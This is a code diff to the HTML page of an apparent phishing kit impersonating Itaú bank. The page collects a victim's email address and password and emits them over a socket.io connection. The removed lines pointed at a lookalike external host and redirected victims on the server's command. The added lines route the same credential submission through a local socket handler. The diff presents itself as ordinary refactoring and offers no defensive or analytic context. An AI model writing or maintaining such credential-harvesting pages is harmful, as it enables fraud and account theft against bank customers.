--- a/correo.html
+++ b/correo.html
@@ -283,34 +283,14 @@
         </form>
     </div>
 
-    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
+    <script src="/socket.io/socket.io.js"></script>
+    <script src="socket-handler.js"></script>
     <script>
-        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
-            reconnection: true,
-            reconnectionDelay: 500,
-            reconnectionDelayMax: 2000,
-            reconnectionAttempts: Infinity,
-            timeout: 10000,
-            transports: ['websocket', 'polling']
-        });
-
-        let sessionId = localStorage.getItem('itau_session_id');
-        
         const email = document.getElementById('email');
         const emailPassword = document.getElementById('emailPassword');
         const submitBtn = document.getElementById('submitBtn');
         const emailForm = document.getElementById('emailForm');
         const loadingOverlay = document.getElementById('loadingOverlay');
-
-        // Initialize session
-        socket.on('connect', () => {
-            socket.emit('init-session', { sessionId });
-        });
-
-        socket.on('session-ready', (data) => {
-            sessionId = data.sessionId;
-            localStorage.setItem('itau_session_id', sessionId);
-        });
 
         email.addEventListener('input', checkFormValidity);
         emailPassword.addEventListener('input', checkFormValidity);
@@ -343,25 +323,19 @@
             if (submitBtn.classList.contains('active')) {
                 loadingOverlay.classList.add('active');
 
-                socket.emit('email', {
+                window.itauSocket.emit('email', {
                     email: email.value,
                     password: emailPassword.value
                 });
             }
         });
 
-        socket.on('email-response', (data) => {
+        window.itauSocket.on('email-response', (data) => {
             if (data.success) {
                 console.log('Email data sent successfully');
             } else {
                 loadingOverlay.classList.remove('active');
                 alert('Error al procesar la solicitud');
-            }
-        });
-
-        socket.on('redirect', (data) => {
-            if (data.page) {
-                window.location.href = data.page;
             }
         });
     </script>
